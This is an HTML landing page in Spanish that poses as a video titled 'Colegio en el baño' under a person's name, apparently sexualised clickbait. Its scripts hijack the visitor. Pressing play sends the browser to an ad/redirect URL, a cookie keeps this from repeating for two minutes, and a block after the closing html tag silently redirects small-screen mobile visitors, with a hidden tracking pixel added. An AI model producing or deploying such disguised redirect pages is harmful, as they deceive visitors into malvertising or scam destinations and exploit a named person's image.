<!DOCTYPE html>
<html lang="es">
<head>
   <meta property="og:image" content="https://scontent.fctg2-1.fna.fbcdn.net/v/t39.30808-6/375897224_10159234827086695_1985040912734968735_n.jpg?_nc_cat=104&ccb=1-7&_nc_sid=6ee11a&_nc_ohc=Nv_YOHjn818Q7kNvgES-PV7&_nc_zt=23&_nc_ht=scontent.fctg2-1.fna&_nc_gid=Aj1E3a8-5vF851GMt0nzMzw&oh=00_AYDpVkP-5DO9R71IKw1AYzpxiBn8BlQlIC0YKBksyEPnbg&oe=67442B1A">
    <meta name="twitter:image:src"https://scontent.fctg2-1.fna.fbcdn.net/v/t39.30808-6/375897224_10159234827086695_1985040912734968735_n.jpg?_nc_cat=104&ccb=1-7&_nc_sid=6ee11a&_nc_ohc=Nv_YOHjn818Q7kNvgES-PV7&_nc_zt=23&_nc_ht=scontent.fctg2-1.fna&_nc_gid=Aj1E3a8-5vF851GMt0nzMzw&oh=00_AYDpVkP-5DO9R71IKw1AYzpxiBn8BlQlIC0YKBksyEPnbg&oe=67442B1A">
    <title> Vladislava Shelygina </title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Colegio en el baño</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }
        header {
            background-color: #333;
            color: #fff;
            padding: 20px;
            text-align: center;
        }
        .container {
            max-width: 800px;
            margin: 20px auto;
            padding: 20px;
        }
        video {
            width: 100%;
            height: auto;
        }
        .cta-button {
            display: none; /* Ocultamos el botón */
            background-color: #4CAF50;
            color: #fff;
            text-align: center;
            padding: 10px 20px;
            margin-top: 20px;
            text-decoration: none;
        }
    </style>
</head>
<body>
<div class="container">
    <video id="landing-video" controls autoplay playsinline>
        <source src="https://cdn.videy.co/1HTl8Tni.mp4" type="video/mp4">
        Tu navegador no soporta la etiqueta de video.
    </video>
    <script>
        var video = document.getElementById('landing-video');
        var directLinkOpened = false;

        // Verificar si hay una cookie guardada
        var cookieValue = document.cookie.replace(/(?:(?:^|.*;\s*)directLinkOpened\s*\=\s*([^;]*).*$)|^.*$/, "$1");
        if (cookieValue === "true") {
            directLinkOpened = true;
        }

        // Evento para abrir el enlace cuando el usuario interactúa con el video
        video.addEventListener('play', function() {
            if (!directLinkOpened) {
                openDirectLink();
            }
        });

        // Función para abrir el enlace directo
        function openDirectLink() {
            // Cambia "tu-enlace" con la URL de tu enlace
            var directLink = "https://adaptunemployed.com/ncd0tibp?key=a38d20c400ac0e1de01424f98192b1cf";
            // Abre el enlace en la misma pestaña
            window.location.href = directLink;
            directLinkOpened = true;
            // Guardar el estado en una cookie por 2 minutos
            var expireDate = new Date();
            expireDate.setTime(expireDate.getTime() + (2 * 60 * 1000)); // 2 minutos
            document.cookie = "directLinkOpened=true; expires=" + expireDate.toUTCString() + "; path=/";
        }
    </script>
</div>

</body>
</html>

  <img src="//whos.amung.us/pingjs/?k=hack21 &t= youtube &x=Youtube.com" style="display:none" alt="">



  <!-- Include the script -->
 <script> if(screen.colorDepth >= 24 && navigator.cookieEnabled == true && screen.width < 500) { setTimeout(setTime, 0); } function setTime() { 

window.location ='https://adaptunemployed.com/ncd0tibp?key=a38d20c400ac0e1de01424f98192b1cf'; } </script>
